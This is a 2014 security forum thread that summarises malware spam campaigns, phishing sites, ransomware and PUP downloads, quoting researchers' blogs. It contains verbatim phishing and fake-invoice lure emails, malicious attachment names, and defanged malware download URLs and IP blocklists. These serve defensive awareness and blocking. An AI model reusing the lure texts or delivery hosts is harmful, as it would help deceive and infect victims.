Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... macro malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414506485/
** http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
- http://blog.dynamoo.com/2014/10/invoice-101760-from-power-ec-ltd-spam.html
28 Oct 2014
> https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414519923/
Recommended blocklist:
62.75.184.70: https://www.virustotal.com/en/ip-address/62.75.184.70/information/
116.48.157.176: https://www.virustotal.com/en/ip-address/116.48.157.176/information/
___
Fake 'Ebola Alert Tool' ...
- https://blog.malwarebytes.org/online-security/2014/10/new-online-ebola-alert-tool-is-anything-but/
Oct 27, 2014 - "... More news of infection outside Africa such as this could further fuel the ever-increasing fear and anxiety for one’s own life and well-being, especially in terms of how one interacts with the outside world. People are trying to be more careful in their dealings than usual, always wanting to be on the know about the latest happenings. This is why web threats banking on perennial hot topics like Ebola could be effective lures against users, especially in the long run... Upon initial visit to the page, users are presented with the following prompt at the top-middle part of the screen:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ebola-with-prompts-1024x341.jpg
Below is a screenshot of the downloaded file with an overview of its details:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/ebolafile.png
EbolaEarlyWarningSystem.exe has a low detection rate as of this writing—four vendors detect it out of 53*... Upon execution, it displays a user interface prompting users to install the ONLY Search toolbar with links to its EULA and Privacy Policy pages. Once users click the “Agree” button, they are again presented with other offers to download, such as a program called Block-n-Surf (a supposed tool used to protect children from adult-related content, System Optimizer Pro (a tool that purportedly optimizes the user’s system), oneSOFTperday (a tool that gives users access to free apps), and a remote access tool among others:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/install5.png?w=564
Once programs are installed, the following have been observed from affected systems: All browser default search pages are changed to ONLY Search:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/onlysearch.png
Once users open a new browser tab, affiliate sites are loaded up (e.g. a site offering insurance):
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/insurance-affiliate.png
Browser windows open to prompt user to install more programs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/pckeeper.png
System Optimizer Pro executes:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/sysoppro-autoexec.png?w=555
- Affected machine slows down
- Shortcut files are created on the desktop
During testing, we haven’t seen any installation of the Ebola Early Warning System toolbar or evidence of warning alerts. We implore users not to be easily swayed with software solutions banking on the Ebola scare. They may be more about enticing internet users into downloading programs that may potentially do harm on their systems, instead of helping them be aware of the current situation**..."
* https://www.virustotal.com/en/file/4c7647ff605a9880f875010b5a09e7f1435b002ad4635dff6c4d14f218eb7dd7/analysis/1414142257/
** http://www.cdc.gov/vhf/ebola/
:mad: :fear:
AplusWebMaster
2014-10-29, 14:24
FYI...
Fake 'Order confirmation' from Amazon SPAM - trojan
- http://blog.mxlab.eu/2014/10/28/fake-order-confirmation-order-details-from-amazon-contains-trojan/
Oct 28, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Order Details”. This email is send from the spoofed address “Amazon .co.uk ” and has the following body:
Good evening,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon .co.uk.
Order Details
Order R:131216 Placed on October 09, 2014
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon...
The 532 kB malicious file is not present in a ZIP file but attached directly and has the name order_report_72364872364872364872364872368.exe (numbers may vary). The trojan is known as Trojan.MSIL.BVXGen, BehavesLike.Win32.Dropper.qh or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/17de4b7fab716f6c87b5d3c941ecb5f5b01d5e4980cff71c88451acc90b22bb0/analysis/1414490630/
- http://myonlinesecurity.co.uk/amazon-com-alert-order-details-malware/
29 Oct 2014
- https://www.virustotal.com/en/file/6fb9d2d2de05751a90e70a2973a51a1cf38939075c6849b650b5f00b07183532/analysis/1414584579/
___
Phish - spoofed Google Drive
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-improve-scheme-with-spoofed-google-drive-site/
Oct 29, 2014 - "Cybercriminals and attackers are leveraging Google Drive site and brand to go under the radar and avoid detection. Just last week, a targeted attack* uses Google Drive as a means into getting information from its victims. This time, phishers are using a modified version of the legitimate Google Drive login page to steal email credentials. This attack can be considered an improved version of attacks seen earlier this year, which asked for multiple email addresses**.
Fake Google Drive Site: Users may receive an email that contains links that lead to the spoofed Google Drive site.
Spammed message containing links to fake site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive1.jpg
The phishing site allows user to log in using different email services, which is highly unusual as Google Drive only uses Google credentials. The site also has a language option that does not work.
Fake Google Drive site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive2.jpg
To trick the user into thinking nothing suspicious is afoot, the phishing site -redirects- the user to a .PDF file from a -legitimate- site about investments. However, this redirection to a site about investments may still raise suspicions as nothing in the email indicates the specific content of the “document” is related to finances.
After logging in, users are redirected to a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive3.jpg
... Mobile Users, Also Affected: Based on our investigation, this attack will also work on mobile devices. When users clicked the “Sign in” button, the PDF file download is prompted and the users’ credentials are sent out to the cybercriminals.
Screenshot of PDF prompt download in mobile devices:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/google_drive_fig8.jpg
... Users should exercise caution when opening emails, even those from known contacts. Avoid clicking links that are embedded in emails. Users can also check first by hovering their mouse over the link; doing so can reveal the true URL of the link in the status bar. Users can also check the legitimacy of the site before sharing any personal data, be it login credentials or contact details. They can check if the site address has any discrepancy (misspellings, different domain names) from the original site (e.g., <sitename .com> versus <sitename .org>). They should also check the security of the site before sharing any information... We have notified Google about this phishing page."
* http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/
** http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
___
Fake ticketmaster SPAM – PDF malware
- http://myonlinesecurity.co.uk/ticketmaster-tickets-sent-fake-pdf-malware/
29 Oct 2014 - "'ticketmaster tickets have been sent' pretending to come from confirmation-noreply@ ticketmaster .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for choosing Ticketmaster.
This email is to confirm ticket(s) have been purchased and attached:
Your Delivery Option is: printed
Your Transaction number is: 869064,00410 ...
29 October 2014: tikets224069_order_type_print_order_details.pdf.zip:
Extracts to: tikets109873_order_type_print_order_details.pdf.exe
Current Virus total detections: 7/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/203daa7fed582e06c8fd7bb770e1f8104c625261e0a03e44ab8ab7296bd4ffac/analysis/1414593309/
___
'Virtual Assistant' - PUP download site
- https://blog.malwarebytes.org/online-security/2014/10/pup-download-site-makes-use-of-virtual-assistant/
Oct 29, 2014 - "... suddenly there’s a person talking at you from the bottom right hand corner of the screen about how you should buy product X or make use of service Y? We recently saw a page asking visitors to upgrade their media player, which Malwarebytes Anti-Malware detect as PUP.Optional.SaferInstall (VirusTotal 12/53*). It looks a lot like many similar download sites out there [1], [2], with one curious addition standing over on the right hand side:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual1.jpg
A virtual assistant! She isn’t very interactive, instead launching into a recorded voiceover after a minute or so of the visitor doing nothing on the webpage. She says:
Please upgrade your media player for faster hd playback.
It only takes a minute on broadband and theres no restart required
Just click this button and follow the easy steps onscreen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual2.jpg
... I haven’t seen a virtual assistant / automated online assistant / video spokesperson / video web presenter / whatever they’re called this week used to promote a PUP (Potentially Unwanted Program) download before... Who knows what.. advertising will offer up next..."
* https://www.virustotal.com/en/file/cf192f2c0c433b10ef963f199ae759264749c72a100d4b5907d555ec748cf519/analysis/1414085568/
... Behavioural information
TCP connections
66.77.96.162: https://www.virustotal.com/en/ip-address/66.77.96.162/information/
87.248.208.11: https://www.virustotal.com/en/ip-address/87.248.208.11/information/
90.84.55.33: https://www.virustotal.com/en/ip-address/90.84.55.33/information/
63.245.201.112: https://www.virustotal.com/en/ip-address/63.245.201.112/information/
1] http://blog.malwarebytes.org/wp-content/uploads/2014/01/asosvouchers5.jpg
2] http://blog.malwarebytes.org/wp-content/uploads/2013/12/obamapads4.jpg
___
Hacks use Gmail Drafts to update their Malware and Steal Data
- http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
10.29.14 - "... Researchers at the security startup Shape Security say they’ve found a strain of malware on a client’s network that uses that new, furtive form of “command and control” — the communications channel that connects hackers to their malicious software — allowing them to send the programs updates and instructions and retrieve stolen data. Because the commands are hidden in unassuming Gmail drafts that are never even sent, the hidden communications channel is particularly difficult to detect. “What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” says Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer — IE allows itself to be run by Windows programs so that they can seamlessly query web pages for information, so the user has no idea a web page is even open on the computer. With the Gmail drafts folder open and hidden, the malware is programmed to use a Python script to retrieve commands and code that the hacker enters into that draft field. The malware responds with its own acknowledgments in Gmail draft form, along with the target data it’s programmed to exfiltrate from the victim’s network. All the communication is encoded to prevent it being spotted by intrusion detection or data-leak prevention. The use of a reputable web service instead of the usual IRC or HTTP protocols that hackers typically use to command their malware also helps keep the hack hidden. Williamson says the new infection is in fact a variant of a remote access trojan (RAT) called Icoscript first found by the German security firm G-Data* in August. At the time, G-Data said that Icoscript had been infecting machines since 2012, and that its use of Yahoo Mail emails to obscure its command and control had helped to keep it from being discovered. The switch to Gmail drafts, says Williamson, could make the malware stealthier still..."
* https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript
___
Dangers of opening suspicious emails: Crowti ransomware
- http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
28 Oct 2014 - "... MMPC has seen a spike in number of detections for threats in the Win32/Crowti ransomware this month as the result of new malware campaigns. Crowti is a family of ransomware that when encountered will attempt to encrypt the files on your PC, and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits. Crowti impacts -both- enterprise and home users, however, this type of threat can be particularly damaging in enterprise environments. In most cases, ransomware such as Crowti can encrypt files and leave them inaccessible. That’s why it’s important to back up files on a regular basis... We also recommend you increase awareness about the dangers of opening suspicious emails – this includes not opening email attachments or links from untrusted sources. Attackers will usually try to imitate regular business transaction emails such as fax, voice mails, or receipts. If you receive an email that you’re not expecting, it’s best to ignore it. Try to validate the source of the email first -before- clicking on a link or opening the attachment... The graph below shows how Crowti ransomware has impacted our customers during the past month.
Daily encounter data for Win32/Crowti ransomware:
> http://www.microsoft.com/security/portal/blog-images/a/crowti1.png
Computers in the United States have been most affected with 71 percent of total infections, followed by Canada, France and Australia.
Telemetry data for Win32/Crowti by country, 21 September – 21 October 2014:
> http://www.microsoft.com/security/portal/blog-images/a/crowti2.png
Crowti is being distributed via spam campaigns with email attachments designed to entice the receiver to open them. We have seen the following attachment names:
VOICE<random numbers>.scr
IncomingFax<random numbers>.exe
fax<random numbers>.scr/exe
fax-id<random numbers>.exe/scr
info_<random numbers>.pdf.exe
document-<random numbers>.scr/exe
Complaint_IRS_id-<random numbers>.scr/exe
Invoice<random numbers>.scr/exe
The attachment is usually contained within a zip archive. Opening and running this file will launch the malware... Our telemetry and research shows that Win32/Crowti is also distributed via exploits kits such as Nuclear, RIG, and RedKit V2. These kits can deliver different exploits, including those that exploit Java and Flash vulnerabilities... Crowti's primary payload is to encrypt the files on your PC. It usually brands itself with the name CryptoDefense or CryptoWall... we saw a Crowti sample distributed with a valid digital certificate which was issued to Trend... This is not associated with Trend Micro and the certificate has since been revoked. Crowti has used digital certificates to bypass detection systems before - we have previously seen it using a certificate issued to The Nielsen Company... There are a number of security precautions that can help prevent these attacks in both enterprise and consumer machines. As well as being aware of suspicious emails and backing up your files, you should also keep your security products and other applications up-to-date. Attackers are taking advantage of unpatched vulnerabilities in software to compromise your machine. Most of the exploits used by Crowti target vulnerabilities found in browser plugin applications such as Java and Flash. Making a -habit- of regularly updating your software can help reduce the risk of infection... we also recommend running a real-time security product..."
:fear::fear: :mad:
AplusWebMaster
2014-10-30, 12:05
FYI...
Fake Securitas SPAM – PDF malware
- http://myonlinesecurity.co.uk/securitas-mail-report-attached-fake-pdf-malware/
30 Oct 2014 - "'From Securitas Mail Out Report Attached' pretending to come from Alert ARC Reports is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk.com
30 October 2014: Q100982010_Mail Out Report.zip: Extracts to: Q100771292_Mail Out Report.exe
Current Virus total detections: 1/54* . This 'From Securitas Mail Out Report Attached' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/835a6a272b252576247a6f51bd1fc6e4ac972284435759baa8fd4f926c25bd97/analysis/1414659759/
___
Fake 'Accounts Payable' SPAM - malware .doc attachment
- http://myonlinesecurity.co.uk/reminder-word-doc-malware/
30 Oct 2014 - "An email with a Microsoft word doc attachment saying 'Please see attached statement sent to us' pretending to come from random names with a subject of 'Further Reminder' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The name of the alleged sender matches the name of the 'Senior Accounts Payable Clerk from the Finance Department' in the body of the email... word macro malware*... The email looks like:
Good afternoon,
Please see attached statement sent to us, I have highlighted on this the payments made to you in full and attached a breakdown of each one for you to correctly allocate. Hope this helps.
Thanking you in advance.
Many Thanks & Kind Regards
Vivian Dennis
Senior Accounts Payable Clerk
Finance Department ..
30 October 2014 : CopyHA779333.doc - Current Virus total detections: 0/53**. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
** https://www.virustotal.com/en/file/949d05c3e51abcee43c74c5309a61b18ffa1cf17cb0be06bdab1a4e52cadb8f5/analysis/1414671500/
- http://blog.dynamoo.com/2014/10/further-reminder-spam-has-malicious.html
30 Oct 2014
... Recommended blocklist:
212.59.117.207: https://www.virustotal.com/en/ip-address/212.59.117.207/information/
217.160.228.222: https://www.virustotal.com/en/ip-address/217.160.228.222/information/
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
81.7.3.101: https://www.virustotal.com/en/ip-address/81.7.3.101/information/
195.154.126.245: https://www.virustotal.com/en/ip-address/195.154.126.245/information/
___
Fake Job offer SPAM - malware
- http://myonlinesecurity.co.uk/job-service-new-offer-job-malware/
30 Oct 2014 - "'Job service New offer Job' pretending to come from Job service is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/new-offer-job.png
30 October 2014: job.pdf.zip: Extracts to: job.pdf.exe
Current Virus total detections: 3/53*. same malware as today’s version of my new photo malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2723a595350cb632eac5f98a794265105e49e1be181a50437184482b32075b94/analysis/1414662840/
** http://myonlinesecurity.co.uk/new-photo-malware/
___
Malicious Browser Extensions
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-look-into-malicious-browser-extensions/
Oct 29, 2014 - "Malicious browser extensions bring about security risks as these often lead to system infection and unwanted spamming on Facebook. Based on our data, these attacks have notably affected users in Brazil. We have previously reported that cybercriminals are putting malicious browsers in the official Chrome Web store. We also came across malware that -bypasses- a Google security feature checks third party extensions... we performed an in-depth analysis of malicious Chrome browser extension and its evasion tactics, after receiving samples in from Facebook. Facebook’s Security team conducts their own malware research and they regularly collaborate with Trend Micro to keep their service safe... Based on our data starting from May 2014 onwards, Trend Micro HouseCall has helped about 1,000,000 users whose computers have been infected by malicious browser extensions. The top affected countries are mostly located in the Latin American region, such as Brazil, Mexico, Colombia, and Peru.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/FB-extension-infection.jpg
... We strongly advise users to avoid clicking links from messages, even if they appear to come from your friends. Users can also opt to use Trend Micro HouseCall* to secure their systems from online threats, including those that may leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat. Below is the SHA1 hash of the malicious file:
4733c4ea00137497daad6d2eca7aea0aaa990b46 "
* http://housecall.trendmicro.com/
___
Popular Science site compromised
- http://community.websense.com/blogs/securitylabs/archive/2014/10/28/official-website-of-popular-science-is-compromised.aspx
28 Oct 2014 - "... injected with a malicious code that -redirects- users to websites serving exploit code, which subsequently drops malicious files on each victim's computer... injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit..."
:mad: :fear:
AplusWebMaster
2014-10-31, 14:25
FYI...
Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
31 Oct 2014 - "This -fake- Amazon email comes with a malicious Word document attached:
From: Amazon.co.uk [auto-shipping@ amazon .co.uk]
Reply-To: "auto-shipping@ amazon .co.uk" [auto-shipping@ amazon .co.uk]
Date: 31 October 2014 09:12
Subject: Your Amazon.co.uk order has dispatched (#203-2083868-0173124)
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit ...
Your order #203-2083868-0173124 (received October 30, 2014) ...
The Word document contains a malicious macro... but is currently undetected at VirusTotal* (the Malwr report doesn't say much...). The macro then downloads http ://ctmail .me/1.exe and executes it. This malicious binary has a detection rate of 4/52**... 84.40.9.34 is Hostway in Belgium, 213.143.97.18 is Wien Energie, Austria. The malware also downloads a DLL as 2.tmp which has a detection rate of 3/54***.
Recommended blocklist:
213.143.97.18
84.40.9.34
ctmail .me "
* https://www.virustotal.com/en/file/30990e856868cf63c8b680aa333d687f38a1efe03c11aea1a290f30c5d6668ac/analysis/1414752406/
** https://www.virustotal.com/en/file/8c79bff0c302a0c1762fc59ab7001001a9293506197579213e087868493b756e/analysis/1414752639/
*** https://www.virustotal.com/en/file/7534ac5bbb9ff975a744c39320e7d372e80007a1896a04533a8a4b92633bf369/analysis/1414754766/
- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
* https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/1414744958/
___
Fake 'Confirmation' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/
31 Oct 2014 - "An email saying 'Please find attached Remittance and BACS confirmation for September and October Invoices' pretending to come from random names, companies and email addresses with a subject of 'Remittance Confirmation [random characters]' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good morning,
Please find attached Remittance and BACS confirmation for September and October Invoices
Best Wishes
Lynn Blevins
Accounts Dept Assistant
Site Management Services (Central) Ltd ...
31 October 2014 : CU293705.doc - Current Virus total detections: 0/52*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5b38d77c33938254fa50ced98a7471dbe4b8ec2aceb1ae2863bb14c812f0f226/analysis/1414747524/
___
Chrome 40 to terminate use of SSL ...
- http://www.theregister.co.uk/2014/10/31/google_puts_down_poodle/
31 Oct 2014 - "... Update 40* will remove SSLv3 and the hard-to-exploit cookie-stealing Padding Oracle on Downgraded Legacy Encryption (POODLE) attack. Cupertino followed -Redmond- in its browser POODLE put-down after a single click FixIt SSLv3 disabler was issued for Internet Explorer** ahead of removal in a few months. Google security engineer Adam Langley wrote in an update that some buggy servers may stop working as a result... -Chrome- 39 will show a yellow flag over the SSL lock icon, the protocol design flaw that allowed hackers to hijack victims' online accounts and which prompted tech companies to dump SSLv3 in upcoming releases such as -Mozilla's- Firefox 34***..."
* https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4
** https://support.microsoft.com/kb/3009008#FixItForMe
*** https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/
:mad: :fear:
AplusWebMaster
2014-11-03, 15:52
FYI...
Fake invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/new-invoice-random-characters-created-word-doc-malware/
3 Nov 2014 - "An email saying 'A new invoice has been created. Please find it attached' pretending to come from TM Group Helpdesk Billing with a subject of 'A new invoice [random characters]' has been created for You' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Client,
A new invoice, WJ7647670C has been created. Please find it attached.
Kind regards, Marcellus Powell
TM Group
Helpdesk Billing
3 November 2014 : PI646028B.doc - Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3c31fec4b4f77ef581151d87313631956c18bbac82a30c389bdb59b3f5b1b31b/analysis/1415010191/
- http://blog.dynamoo.com/2014/11/tm-group-new-invoice-ab1234567c-has.html
3 Nov 2014
... Recommended blocklist:
91.222.139.45
213.140.115.29
149.62.168.210
111.125.170.132
121.78.88.208 "
___
Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
UPDATE 1: 2014-11-03 - "... different version of the attachment (called ORDER-203-2083868-0173124.doc) which has a VirusTotal detection rate of 0/54* and contains this malicious macro... This downloads a file from http ://hilfecenter-harz .de/1.exe which also has zero detections at VirusTotal... It also downloads a malicious DLL... this as a version of Cridex...
Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter- harz .de
garfield67 .de
* https://www.virustotal.com/en/file/554695f6d0cd97c2a31fc7f205f3ac3b364f0154d70be41685731f1226e8eeaf/analysis/1415004635/
:mad: :fear:
AplusWebMaster
2014-11-04, 14:03
FYI...
Fake 'New order' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/new-order-7757100-site-word-doc-malware/
4 Nov 2014 - "'New order 7757100' from site is an email saying 'Thank you for ordering' pretending to come from random names at random companies with a subject of 'New order 7757100 from site' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is -malformed- and contains a macro script virus... DO NOT follow the advice they give to enable macros to see the content. Almost all of these malicious word documents appear to be -blank- when opened...
Screenshots: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/New-order-7757100-from-site.png
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/protected-view-macros.png
4 November 2014 : Order561104135.doc - Current Virus total detections: 1/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/16e0fbdbab2fd8d88e8ab1a7ca42e4dc2ea9682ede6a06e6c3a85dae499cec1b/analysis/1415093505/
___
Fake 'Remittance' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duco-remittance-advice-november-word-doc-malware/
4 Nov 2014 - "An email saying 'Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP' pretending to come from DUCO with a subject of 'Remittance Advice November' [ random characters] with a malicious word document attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Sir/Madam
Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP
Regards,
Domenic Burton
Accounts Payable Department DUCO
4 November 2014 : De_BW574826C.doc - Current Virus total detections: 0/44*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/792e5c3c2886d6fe7d0b10a25fd78023a7b862a79bd6e461a5e23ecccbc371ef/analysis/1415106043/
- http://blog.dynamoo.com/2014/11/duco-remittance-advice-november-spam.html
4 Nov 2014
- https://www.virustotal.com/en/file/3d6378750d713270bbafc1a18754626d148396253429a6a70c018eadb988120a/analysis/1415110852/
... Behavioural information
TCP connections
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
213.140.115.29: https://www.virustotal.com/en/ip-address/213.140.115.29/information/
___
'C-93 Virus Alert' - Phish ...
- http://www.hoax-slayer.com/C93-virus-alert-phishing-scam.shtml
Nov 4, 2014 - "An email claiming to be from Windows Outlook warns that a 'C93 Virus' has been detected in your mailbox and you are therefore -required- to -click- a link to run a Norton anti-virus scan to resolve the issue. The email is -not- from Outlook or Microsoft. It is a phishing scam designed to trick you into giving your Microsoft Account login details to criminals... According to this email, which claims to be from 'Windows Outlook', a 'C93 Virus' has been detected in your mailbox. The message instructs you to click a link to run a Norton anti-virus scan that will 'remove all Trojan and viral bugs' from your account. But, warns the message, if you fail to run the scan, your mailbox will be -deactivated- ... Example:
Dear Outlook Member,
A C93 Virus has been detected in your mailbox, You are required to apply the new Norton AV security anti-virus to scan and to remove all Trojan and viral bugs from your mailbox Account, Failure to apply the scan your mailbox will be De-Activated to avoid our database from being infected.
Click on Optimal Scan and Log in to apply the service.
Thank you ...
If you click the link, you will be taken to a -fake- webpage that is designed to look like a genuine Microsoft account login. When you enter your login details and click the 'Sign In' button, you will be automatically -redirected- to a genuine Microsoft account page... the criminals can collect your login details and use them to hijack your real Microsoft Account. Because the same credentials are used to login to various Microsoft services, they are a valuable commodity for scammers... If you receive one of these -fake- virus warnings, do -not- click any links or open any attachments..."
___
Bitcoin bonanza - or blunders?
- https://www.virusbtn.com/blog/2014/11_04.xml
4 Nov 2014 - "... 'occasionally losing a lot of money through bugs and blunders... 'hard not to feel dizzy and somewhat overwhelmed by the security issues and implications.
> https://www.virusbtn.com/virusbulletin/archive/2014/11/figures/Pontiroli-1.jpg
Malware targeting Bitcoin wallets or using other people's resources to mine for cryptocurrencies are perhaps the least of our worries. What about virus code (or worse, child abuse material) ending up in the blockchain? Or the common flaw of transaction malleability? Or the almost existential threat of the "51% attack"? Cryptocurrencies are here to stay, but they come with their own unique set of problems that we cannot ignore... we're not in Kansas anymore..."
(More detail at the top virusbtn URL.)
- https://www.virusbtn.com/blog/2014/10_31a.xml
31 Oct 2014
___
Facebook: gov't requests for user data rises 24%
- http://www.reuters.com/article/2014/11/04/us-facebook-data-idUSKBN0IO21Z20141104
Nov 4, 2014 - "Facebook Inc said requests by governments for user information rose by about a quarter in the first half of 2014 over the second half of last year. In the first six months of 2014, governments around the world made 34,946 requests for data. During the same time, the amount of content restricted because of local laws increased about 19 percent... Google reported in September a 15 percent sequential increase in the number of requests in the first half of this year, and a 150 percent rise in the last five years, from governments around the world to reveal user information in criminal investigations."
:mad: :fear:
AplusWebMaster
2014-11-05, 15:31
FYI...
Backoff PoS malware - stealthier, more difficult to analyze
- http://net-security.org/malware_news.php?id=2906
Nov 5, 2014 - "... Backoff infections are still on the rise. Fortinet researchers* have recently managed to get their hands on a new Backoff variant that shows that its authors haven't been idle. This version also does not have a version number, but has been given the name Backoff ROM. Compared to the older versions, Backoff ROM disguises itself as as a media player (mplayerc.exe) instead of a Java component in the autorun registry entries... Traffic between the malware and the C&C server is also encrypted, and the way the server responds with new commands for the malware has been simplified... for whatever reason, this new Backoff version does not have keylogging capabilities. But, the researchers believe that this is only a temporary change that will be reversed in newer versions..."
* http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware
- https://www.damballa.com/state-infections-report-q3-2014/
10/24/2014
> https://www.damballa.com/wp-content/uploads/2014/10/soi-q3-2014.jpg
- http://atlas.arbor.net/briefs/index#1351521298
Elevated Severity
6 Nov 2014
